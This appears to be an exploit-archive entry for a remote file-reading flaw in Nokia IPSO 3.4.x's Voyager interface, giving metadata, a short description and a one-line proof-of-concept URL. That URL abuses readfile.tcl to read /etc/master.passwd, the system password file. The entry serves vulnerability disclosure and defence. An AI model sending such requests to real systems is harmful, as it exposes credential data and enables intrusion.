Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading
Author: Jonas Eriksson
type: remote
platform: hardware
port:
date_added: 2003-04-24
date_updated: 2012-11-07
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/7426/info
It has been reported that Nokia IPSO does not properly handle some types of requests through Voyager. Because of this, an attacker with access to the interface may be able to view potentially sensitive information.
http://www.example.com/cgi-bin/readfile.tcl?file=/etc/master.passwd